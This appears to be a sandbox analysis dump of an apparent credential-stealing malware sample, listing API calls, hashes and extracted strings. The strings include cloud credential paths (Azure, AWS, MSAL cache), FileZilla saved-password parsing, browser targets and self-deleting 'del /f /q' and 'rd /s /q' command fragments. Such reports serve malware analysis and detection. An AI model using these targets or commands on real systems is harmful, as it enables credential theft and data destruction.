                                                            • Instruction Fuzzy Hash: FD2103B194126C8BCB60CF15DD486DDB7B4BB59309F00B1DAD489AA250C7B84FD9CF49
                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,74DE83C0,00000000,0041C66E,?), ref: 0041B988
                                                            • StrCmpCA.SHLWAPI(74DE83C0,0043613C), ref: 0041B9B6
                                                            • StrCmpCA.SHLWAPI(74DE83C0,.zip), ref: 0041B9C6
                                                            • StrCmpCA.SHLWAPI(74DE83C0,.zoo), ref: 0041B9D2
                                                            • StrCmpCA.SHLWAPI(74DE83C0,.arc), ref: 0041B9DE
                                                            • StrCmpCA.SHLWAPI(74DE83C0,.lzh), ref: 0041B9EA
                                                            • StrCmpCA.SHLWAPI(74DE83C0,.arj), ref: 0041B9F6
                                                            • StrCmpCA.SHLWAPI(74DE83C0,.gz), ref: 0041BA02
                                                            • StrCmpCA.SHLWAPI(74DE83C0,.tgz), ref: 0041BA0E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                            • API String ID: 1659193697-51310709
                                                            • Opcode ID: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
                                                            • Instruction ID: 04d37d8bf72ca36d8f635762d850a2ddb5f423679fb0dd0bb54afd8eff972df8
                                                            • Opcode Fuzzy Hash: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
                                                            • Instruction Fuzzy Hash: D601B571691367B15A2226316E41FBF1E6CCD86F80F15202BED00E2289EB4C9C8356FE
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memset
                                                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                            • API String ID: 2102423945-974132213
                                                            • Opcode ID: 1248a50cc083a135fbf0f89df80aa356fe011ce7e916853b59fe57bee07ce889
                                                            • Instruction ID: 84896bacdfb64059cc425482cd21a2e289ba5d14c04e476c3e3a3401a8d995fd
                                                            • Opcode Fuzzy Hash: 1248a50cc083a135fbf0f89df80aa356fe011ce7e916853b59fe57bee07ce889
                                                            • Instruction Fuzzy Hash: E841C671D4021C7BDB14EB60EC47FDD7378AB09304F6044AAB605A7090EABDAB888F58
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memset$strtok_s$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                            • API String ID: 2378718607-332874205
                                                            • Opcode ID: cdfd22d0e11b45c9efbff38089d8f3840ce91f29f908b9a5275c7c26593a396f
                                                            • Instruction ID: 9768ecd297fb6e20fca964dbbce2c4256e5a8c732881b8487d541fa13927e408
                                                            • Opcode Fuzzy Hash: cdfd22d0e11b45c9efbff38089d8f3840ce91f29f908b9a5275c7c26593a396f
                                                            • Instruction Fuzzy Hash: 95C12AB1E0021AABCF22EF60DC45AEE777DAF08305F0140A6FA09A3151DB399F858F55
                                                            APIs
                                                            • strtok_s.MSVCRT ref: 0040E77E
                                                              • Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
                                                              • Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateObjectSingleThreadWaitstrtok_s
                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                            • API String ID: 2687659135-935134978
                                                            • Opcode ID: 50749591bd779b1798e59f7b5f1774cbe48aab8804e91c0819f0dfcfdefeffec
                                                            • Instruction ID: 14048a2b419fde31a88832429adc402d622cfb8f20e2d9bcd7eb6ceae992149e
                                                            • Opcode Fuzzy Hash: 50749591bd779b1798e59f7b5f1774cbe48aab8804e91c0819f0dfcfdefeffec
                                                            • Instruction Fuzzy Hash: E5A18572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                            • String ID:
                                                            • API String ID: 3833677464-0
                                                            • Opcode ID: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
                                                            • Instruction ID: 43a3aa265a383408f17471e0f34179b95454a98dc0d8d6604ebfa51982022fc1
                                                            • Opcode Fuzzy Hash: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
                                                            • Instruction Fuzzy Hash: FB21043130A6309ADB21BF27F802A5EB7E4EF91754F60842FF48456251EF399850CA6C
                                                            APIs
                                                              • Part of subcall function 004015BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 004015C6
                                                              • Part of subcall function 004015BC: HeapAlloc.KERNEL32(00000000), ref: 004015CD
                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00401606
                                                            • GetLastError.KERNEL32 ref: 0040160C
                                                            • SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00401614
                                                            • GetWindowContextHelpId.USER32(00000000), ref: 0040161B
                                                            • GetWindowLongW.USER32(00000000,00000000), ref: 00401623
                                                            • RegisterClassW.USER32(00000000), ref: 0040162A
                                                            • IsWindowVisible.USER32(00000000), ref: 00401631
                                                            • ConvertDefaultLocale.KERNEL32(00000000), ref: 00401638
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401644
                                                            • IsDialogMessageW.USER32(00000000,00000000), ref: 0040164C
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00401656
                                                            • HeapFree.KERNEL32(00000000), ref: 0040165D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
                                                            • String ID:
                                                            • API String ID: 3627164727-0
                                                            • Opcode ID: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
                                                            • Instruction ID: 597bc7deab9f95c5419af2560a3a18d661806b2e942c9da5f2f727d66e905f75
                                                            • Opcode Fuzzy Hash: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
                                                            • Instruction Fuzzy Hash: 17014672402824FBC7156BA1BD6DDDF3E7CEE4A3527141265F60A910608B794A01CBFE
                                                            APIs
                                                            • _free.LIBCMT ref: 00426754
                                                            • _free.LIBCMT ref: 00426762
                                                            • _free.LIBCMT ref: 0042676D
                                                            • _free.LIBCMT ref: 00426741
                                                              • Part of subcall function 0041DA5B: HeapFree.KERNEL32(00000000,00000000,?,0041D2A3,00000000,0043B7AC,0041D2EA,0040EEBE,?,?,0041D3D4,0043B7AC,?,?,0042ED58,0043B7AC), ref: 0041DA71
                                                              • Part of subcall function 0041DA5B: GetLastError.KERNEL32(?,?,?,0041D3D4,0043B7AC,?,?,0042ED58,0043B7AC,?,?,?), ref: 0041DA83
                                                            • ___free_lc_time.LIBCMT ref: 0042678B
                                                            • _free.LIBCMT ref: 00426796
                                                            • _free.LIBCMT ref: 004267BB
                                                            • _free.LIBCMT ref: 004267D2
                                                            • _free.LIBCMT ref: 004267E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lc_time
                                                            • String ID: xLC
                                                            • API String ID: 3704779436-381350105
                                                            • Opcode ID: 75c8617aa577018b802f999097e256e29a76f75524ffb918136c170e5bfc19f7
                                                            • Instruction ID: 3a25437d7ba4b5db782e2d0491041096a79b2f5d500c154d40e95b3c30946f3d
                                                            • Opcode Fuzzy Hash: 75c8617aa577018b802f999097e256e29a76f75524ffb918136c170e5bfc19f7
                                                            • Instruction Fuzzy Hash: 48118FB2A04712DBDB20EF65F885B9A73E5AF81359F55493FE10897241CB3CAC84CB18
                                                            APIs
                                                            • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041BAD8
                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0041BB51
                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041BB6D
                                                            • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041BB81
                                                            • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041BB8A
                                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BB9A
                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041BBB8
                                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BBC8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$PointerRead$HandleInformationSize
                                                            • String ID:
                                                            • API String ID: 2979504256-3916222277
                                                            • Opcode ID: b93520a0e31e70c5fcafbd99113cd43e56b40bfe3ff6e632537e59c659fb1c6e
                                                            • Instruction ID: cb892b0c559bbcf0e4207802013ae1cf0d61ca8ae93d0e0fc4d1a3101aeab4e7
                                                            • Opcode Fuzzy Hash: b93520a0e31e70c5fcafbd99113cd43e56b40bfe3ff6e632537e59c659fb1c6e
                                                            • Instruction Fuzzy Hash: E951F471D00218AFDB18DF99DC85AEEBBB9EF04304F10442AE511E6660D738AD85CF94
                                                            APIs
                                                            Strings
                                                            • " & exit, xrefs: 00418499
                                                            • " & rd /s /q "C:\ProgramData\, xrefs: 00418443
                                                            • /c timeout /t 10 & del /f /q ", xrefs: 004183F5
                                                            • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 004184A0
                                                            • " & exit, xrefs: 004184EA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memset
                                                            • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                            • API String ID: 2102423945-1079830800
                                                            • Opcode ID: e286fd93b08e4a18dfef94903c3e9d688eebfe5aa50bc46730d0cd5ef8038a27
                                                            • Instruction ID: 2c77cb5680fdc6ddbc4f3b9c6c2dd7c8d8e6f6f770fdddae2c6db266beba6389
                                                            • Opcode Fuzzy Hash: e286fd93b08e4a18dfef94903c3e9d688eebfe5aa50bc46730d0cd5ef8038a27
                                                            • Instruction Fuzzy Hash: EB51BDB1E402299BCF21EF65CD416DDB3BCAB44708F4104EAA618B3151DB786FC68E58
                                                            APIs
                                                            • UnDecorator::getArgumentList.LIBCMT ref: 0041FA87
                                                              • Part of subcall function 0041F622: Replicator::operator[].LIBCMT ref: 0041F6A5
                                                              • Part of subcall function 0041F622: DName::operator+=.LIBCMT ref: 0041F6AD
                                                            • DName::operator+.LIBCMT ref: 0041FAE0
                                                            • DName::DName.LIBCMT ref: 0041FB38
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                            • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                            • API String ID: 834187326-2211150622
                                                            • Opcode ID: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
                                                            • Instruction ID: 6b38829ecadea6215c8f6510e569e1b7c44c0c93244dcadd2c287e51603536b5
                                                            • Opcode Fuzzy Hash: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
                                                            • Instruction Fuzzy Hash: 72217130601208AFCB11DF5CD4549AA7BB4EF4538AB54806AE845CB362E738E987CB4C
                                                            APIs
                                                            • UnDecorator::UScore.LIBCMT ref: 00421405
                                                            • DName::DName.LIBCMT ref: 00421411
                                                              • Part of subcall function 0041F0DC: DName::doPchar.LIBCMT ref: 0041F10D
                                                            • UnDecorator::getScopedName.LIBCMT ref: 00421450
                                                            • DName::operator+=.LIBCMT ref: 0042145A
                                                            • DName::operator+=.LIBCMT ref: 00421469
                                                            • DName::operator+=.LIBCMT ref: 00421475
                                                            • DName::operator+=.LIBCMT ref: 00421482
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                            • String ID: void
                                                            • API String ID: 1480779885-3531332078
                                                            • Opcode ID: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
                                                            • Instruction ID: 57a596a2ca760a273274528444675b4bf9d61aebdbb2dca40c7be891dda90938
                                                            • Opcode Fuzzy Hash: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
                                                            • Instruction Fuzzy Hash: B811C671A00218AFD714FF68D856BE97B60AF20305F44409BE4069B2F2DB78DA86CB49
                                                            APIs
                                                            • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                            • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                            • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                            • API String ID: 0-1710495004
                                                            • Opcode ID: cd45a82cdec32a0644e9fc934847dcd5132f8985d98157332d9820e1aa53d843
                                                            • Instruction ID: 0260d5c266de210f65568f4b73986d2e2321fdcb1199aff99a3b39d86c03169e
                                                            • Opcode Fuzzy Hash: cd45a82cdec32a0644e9fc934847dcd5132f8985d98157332d9820e1aa53d843
                                                            • Instruction Fuzzy Hash: F4021C71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3192DBB86FC98F88
                                                            APIs
                                                            • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                            • _memset.LIBCMT ref: 0040FBC1
                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                              • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: OpenProcess_memmove_memset
                                                            • String ID: N0ZWFt
                                                            • API String ID: 2647191932-431618156
                                                            • Opcode ID: 5f62aa5b6abcaa0ca0cbb89d9b96bb4e1aae85ed0061038e1d2274415a3f45d9
                                                            • Instruction ID: 446351bc283c4762e53d247ac54b49bb6219315ee7fac77137ec1a6eb046dabb
                                                            • Opcode Fuzzy Hash: 5f62aa5b6abcaa0ca0cbb89d9b96bb4e1aae85ed0061038e1d2274415a3f45d9
                                                            • Instruction Fuzzy Hash: 4A5191B1D0022C9FDB309F54DC85BDDB7B8AB44308F0001FAA609B7692D6796E898F59
                                                            APIs
                                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040F934
                                                            • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000), ref: 0040F95E
                                                            • ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0040F9AB
                                                            • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040FA04
                                                            • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0040FA5C
                                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040FA6D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MemoryProcessQueryReadVirtual
                                                            • String ID: @
                                                            • API String ID: 3835927879-2766056989
                                                            • Opcode ID: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
                                                            • Instruction ID: 782d1e78530d26aac93c20cf39dad9713f636d1ba6f6d7f846141922d26d4ee5
                                                            • Opcode Fuzzy Hash: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
                                                            • Instruction Fuzzy Hash: B8419D32A00209BBDF209FA5DC49FDF7B76EF44760F14803AFA04A6690D7788A55DB94
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memset$ObjectSingleWait
                                                            • String ID: .exe$EMPTY$af641acce3f8c85bf2490a9b3aa972c5
                                                            • API String ID: 12478032-2745533388
                                                            • Opcode ID: 750546415860910891eec85b0912701edd85bbb488ea7fafddc03ecc979db47c
                                                            • Instruction ID: 304a4236ee7f0de4f144c20be59e76cfc50544f1b2deb0a0f06e66ba437c67be
                                                            • Opcode Fuzzy Hash: 750546415860910891eec85b0912701edd85bbb488ea7fafddc03ecc979db47c
                                                            • Instruction Fuzzy Hash: E9814FB2E50129ABCF11EF61DD46ACE7379AB04309F4054BAB708B3051D679AFC98F58
                                                            APIs
                                                            • lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0040DBBB
                                                            • strchr.MSVCRT ref: 0040DBCD
                                                            • strchr.MSVCRT ref: 0040DBF2
                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
                                                            • strcpy_s.MSVCRT ref: 0040DC6F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlenstrchr$strcpy_s
                                                            • String ID: 0123456789ABCDEF
                                                            • API String ID: 1957064729-2554083253
                                                            • Opcode ID: d7f8adf961633c923ded35c4b7c571d3f1c689bf508e1cbb2af2f09870105798
                                                            • Instruction ID: 06d15f49a8eb9cf9066e179aa7ea4312028ee3a66f1e5adc80d081fb3659f8e0
                                                            • Opcode Fuzzy Hash: d7f8adf961633c923ded35c4b7c571d3f1c689bf508e1cbb2af2f09870105798
                                                            • Instruction Fuzzy Hash: 4A315D72D002199FDB00DFE8DC49ADEBBB9AF09355F100179E901FB281DB79A909CB94
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Name::operator+$NameName::
                                                            • String ID: throw(
                                                            • API String ID: 168861036-3159766648
                                                            • Opcode ID: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
                                                            • Instruction ID: ba1955fdff4c252f9a606c57b8f1c9a48ddf06d7b75bf01b8414d0fb9b5eadfe
                                                            • Opcode Fuzzy Hash: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
                                                            • Instruction Fuzzy Hash: E4015B34600209EFCF04DF64D856DED7BB5EF44749F50407AF50597292DA78EA8AC748
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strtok_s
                                                            • String ID: false$true$zA
                                                            • API String ID: 3330995566-752889570
                                                            • Opcode ID: 266bee341c7ceb3c75019c964d133af86dd942388cf45366b56daf47d7fe114c
                                                            • Instruction ID: f88d8e482521469d959c87b5d2553cfe3082ffd239838e960e1cb591ae3ba6ed
                                                            • Opcode Fuzzy Hash: 266bee341c7ceb3c75019c964d133af86dd942388cf45366b56daf47d7fe114c
                                                            • Instruction Fuzzy Hash: 37B16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                            APIs
                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,74DE83C0,00000000,?,?,?,?,?,?,0041C6A2,?,00417037,?), ref: 0041C12C
                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0041C6A2,?,00417037), ref: 0041C15C
                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0041C6A2,?,00417037,?), ref: 0041C188
                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0041C6A2,?,00417037,?), ref: 0041C196
                                                              • Part of subcall function 0041BAA4: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041BAD8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                            • String ID: 7pA
                                                            • API String ID: 3986731826-4034994935
                                                            • Opcode ID: 67e2672ab753ca4f37cc9b7268c95e0e1104df219937840ae09d8f1390f1a5d2
                                                            • Instruction ID: a03e18f876bb7c6bb95fa29af4f0117ab82ea060c0d505197b56aaa6882e86ab
                                                            • Opcode Fuzzy Hash: 67e2672ab753ca4f37cc9b7268c95e0e1104df219937840ae09d8f1390f1a5d2
                                                            • Instruction Fuzzy Hash: 97415971900209EBCF15DF69CC80ADEBBF8FF48310F10426AE854EA266D7349985CFA4
                                                            APIs
                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0040F2C7
                                                              • Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042ED7A
                                                              • Part of subcall function 0042ED65: __CxxThrowException@8.LIBCMT ref: 0042ED8F
                                                              • Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042EDA0
                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0040F2E6
                                                            • _memmove.LIBCMT ref: 0040F320
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                            • String ID: invalid string position$string too long
                                                            • API String ID: 3404309857-4289949731
                                                            • Opcode ID: 585f722b960d61c8edb6e887eede1a8e5c7a6d662bb162e141d0d5ca5504c1c1
                                                            • Instruction ID: 8d1b4f359d452bc0139d647030d3afcb4c777ebb34d0dc45517a8c2f57a5c6cf
                                                            • Opcode Fuzzy Hash: 585f722b960d61c8edb6e887eede1a8e5c7a6d662bb162e141d0d5ca5504c1c1
                                                            • Instruction Fuzzy Hash: 4C11E071300202AFCB24EF2DD981A59B3A5BF41324754053AF805EBAC2C778ED598799
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _freemalloc
                                                            • String ID:
                                                            • API String ID: 3576935931-0
                                                            • Opcode ID: 641b289af0baeaab8b9a5171f60c0491d104b74c17f1ced00544f24bd9ae676e
                                                            • Instruction ID: 935c43270f4d77db60209791427c9bc320832430a8ecb60128fe957c4bbf0321
                                                            • Opcode Fuzzy Hash: 641b289af0baeaab8b9a5171f60c0491d104b74c17f1ced00544f24bd9ae676e
                                                            • Instruction Fuzzy Hash: 1511EB32B04A35ABCF217F36BC0475A37A4AF403A5F60443BF948DB251DA7CC99186AC
                                                            APIs
                                                            • __getptd.LIBCMT ref: 00426845
                                                              • Part of subcall function 00424A74: __getptd_noexit.LIBCMT ref: 00424A77
                                                              • Part of subcall function 00424A74: __amsg_exit.LIBCMT ref: 00424A84
                                                            • __getptd.LIBCMT ref: 0042685C
                                                            • __amsg_exit.LIBCMT ref: 0042686A
                                                            • __lock.LIBCMT ref: 0042687A
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0042688E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                            • String ID:
                                                            • API String ID: 938513278-0
                                                            • Opcode ID: 4402fd7a9f35548a0a6e406088b1ac9e9fe92c8952a9fc7886658e1653cea504
                                                            • Instruction ID: 17361057c0d52ffbfdd5451dd0703f081e16a6d4bb330f32ad13174130427518
                                                            • Opcode Fuzzy Hash: 4402fd7a9f35548a0a6e406088b1ac9e9fe92c8952a9fc7886658e1653cea504
                                                            • Instruction Fuzzy Hash: E7F09676F417309AD621BB7A7403B5E76A0AF00769F92425FF4106A2D2CF6C9980CA5D
                                                            APIs
                                                            Strings
